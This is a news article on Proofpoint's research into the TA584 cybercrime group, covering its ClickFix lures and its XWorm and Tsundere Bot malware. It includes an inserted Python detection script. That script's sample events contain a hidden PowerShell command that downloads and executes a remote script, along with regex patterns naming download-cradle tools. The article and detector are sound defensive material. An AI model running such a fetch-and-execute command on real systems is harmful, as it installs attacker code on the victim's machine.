SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Proofpoint details TA584’s fast-evolving 2025 attacks

Fri, 30th Jan 2026

Proofpoint has reported a sharp rise in activity from TA584, a cybercriminal group it links to initial access brokering and follow-on attacks such as ransomware and data theft.

The company said the actor increased the pace and volume of its email-led campaigns during 2025, while frequently changing lures, infrastructure and payloads. Proofpoint said that approach reduced the value of static indicators and blocklists for defenders tracking the group.

Proofpoint tracks TA584 as an established actor, with activity it has monitored since 2020. It said the group's earlier operations used more repeatable patterns, compared with the faster campaign churn it observed during 2025.

Rising tempo

Proofpoint said TA584 tripled the number of monthly campaigns from March to December 2025. It said individual campaigns often stayed active for hours or days before the actor replaced them or changed key elements. Proofpoint described overlapping operations that used different themes, branding and landing pages.

The research focused on email as the initial access vector and tracked activity from message delivery through early execution. Proofpoint said it clustered campaigns using attributes such as delivery characteristics, infrastructure patterns, landing page design, geofencing behaviour and malware configuration.

TA584 overlaps with a group tracked elsewhere as Storm-0900, according to Proofpoint.

ClickFix shift

Proofpoint said a major change arrived from late July 2025 when TA584 switched to ClickFix social engineering. The technique uses fake error prompts on web pages. It directs recipients to copy, paste and run commands on their own machines.

Proofpoint said TA584's more recent chains used unique URLs for each target, along with geofencing and IP filtering. It said users who passed those checks reached a lure-matching landing page with a CAPTCHA. Proofpoint said the chain then presented ClickFix instructions that executed PowerShell, which fetched a remote script that delivered the final malware.

The company also described redirect chains and intermediary services that obscured payload locations. It said TA584 changed URLs and redirects between campaigns. It said the approach reduced visibility for sandboxes and URL scanning services.

Broader targeting

Proofpoint said TA584 historically focused on North America and parts of Europe, including the UK and Ireland. It said the actor later expanded targeting to include Germany more regularly during 2025, after earlier low-volume activity aimed at the country in 2023.

Proofpoint said campaigns rotated between regions. It said TA584 adjusted branding, language and lure themes based on target geography. It also reported limited targeting of Australia since at least spring 2025.

Message volumes ranged from a few thousand to nearly 200,000 per campaign, Proofpoint said. It described the actor as opportunistic rather than focused on a particular industry, while noting recurring impersonation of healthcare and government entities.

The company said TA584's impersonations spanned recruitment and business services firms and well-known brands. Themes included tax obligations, payments, parking tickets, medical test results and business complaints. Proofpoint also highlighted one campaign that used an image of purported physical mail that included the target's name and address.

New malware

Proofpoint said TA584 continued to deliver XWorm during 2025, using a configuration it labels "P0WER". XWorm is a remote access trojan that has circulated since 2022 and is sold on criminal forums, Proofpoint said.

It also reported a new addition from late November 2025, when TA584 began distributing Tsundere Bot alongside XWorm. Proofpoint described Tsundere Bot as malware-as-a-service with backdoor and loader functions.

Proofpoint said Tsundere Bot uses blockchain-based command-and-control discovery. It said the malware retrieves command-and-control and configuration information from the Ethereum blockchain via multiple RPC providers, and then communicates with command-and-control over WebSockets. It said the tooling includes a panel that offers installer generation and a market for buying and selling infected machines.

Proofpoint said Tsundere Bot requires Node.js on the infected system. It said installer scripts can fetch and install Node.js, then deploy the malware. It also said the malware checks system locale and exits when it detects CIS country languages.
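The two behaviours described above lend themselves to endpoint detection rather than indicator blocklists: the ClickFix chain ends in PowerShell launched from the user's own Run prompt with a download cradle, and Tsundere Bot needs a Node.js runtime that the installer drops into a user-writable directory. The following is an added example (not Proofpoint's detection logic) that applies those two heuristics to constructed Sysmon-style process-creation events; the paths, command lines and rule names are hypothetical.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 style records; none of these are real observed events.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",  # Win+R dialog runs under explorer.exe
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/x.txt -UseBasicParsing)"'},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",  # benign developer usage
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\build\\deploy.ps1"},
    {"parent": r"C:\Users\alice\AppData\Roaming\nodesetup\run.bat",  # runtime dropped by an installer script
     "image": r"C:\Users\alice\AppData\Roaming\nodejs\node.exe",
     "cmdline": r"node.exe C:\Users\alice\AppData\Roaming\nodejs\app\index.js"},
    {"parent": r"C:\Program Files\nodejs\node.exe",  # system-wide, admin-installed Node.js
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "node build.js"},
]

# Download-cradle verbs that fetch and run remote content in one step.
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|curl|wget)\b", re.I)
# Flags that hide the window, bypass execution policy or obscure the command.
EVASION = re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:p|xecutionpolicy)\s+bypass|enc(?:odedcommand)?)\b", re.I)
# Directories an unprivileged user can write to, where a dropped runtime would land.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Return the names of the heuristics this event matches (empty list if none)."""
    hits: List[str] = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if image in ("powershell.exe", "pwsh.exe") and CRADLE.search(cmd):
        # A cradle launched from the Run dialog, or with evasion flags, is the ClickFix shape.
        if parent == "explorer.exe" or EVASION.search(cmd):
            hits.append("clickfix_powershell_cradle")
    if image == "node.exe" and USER_WRITABLE.search(ev["image"]):
        hits.append("node_runtime_in_user_writable_path")
    return hits


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (index, matched_rules) for every event that triggers at least one heuristic."""
    return [(i, evaluate(ev)) for i, ev in enumerate(events) if evaluate(ev)]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(rules)}")
```

Neither rule is a blocklist entry: both key on process lineage and command-line shape, so they survive the URL and infrastructure rotation the article describes.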

Proofpoint said earlier TA584 payloads over the years included Ursnif, LDR4, WarmCookie, Xeno RAT and Cobalt Strike, with a single outlier campaign distributing DCRAT in September 2025.

Proofpoint described TA584 as an initial access broker, with infections that can lead to ransomware. It said the group's activity showed ties to the Russian cybercriminal ecosystem based on malware and artefacts used in its chains.

Proofpoint also addressed how defenders should respond to the group's pace of change.

"The research we're publishing this week represents the most comprehensive public look into the prominent cybercrime threat actor TA584. Frequently targeting North America and Europe with sophisticated social engineering and constantly changing techniques, TA584 shows how criminals can be very creative and rapidly innovate to target people more effectively. In 2025, TA584 demonstrated major changes, including new social engineering techniques like ClickFix, and using new malware called Tsundere Bot, which it continues to use in ongoing campaigns. Because of its unique campaigns, static detections and reliance on IOCs alone are not effective defences against this actor.

By understanding behaviour of actors like TA584, organisations can better understand and defend against the evolving cybercriminal threat landscape. We know that criminals learn from each other, and it's possible this actor's high-volume, highly customised, and persistently evolving activity may be adopted by more actors in the future," said Selena Larson, Senior Threat Intelligence Analyst, Proofpoint.

Proofpoint said it expects TA584 to continue experimenting with payloads and to keep changing its infrastructure and lures as it rotates targeting across regions.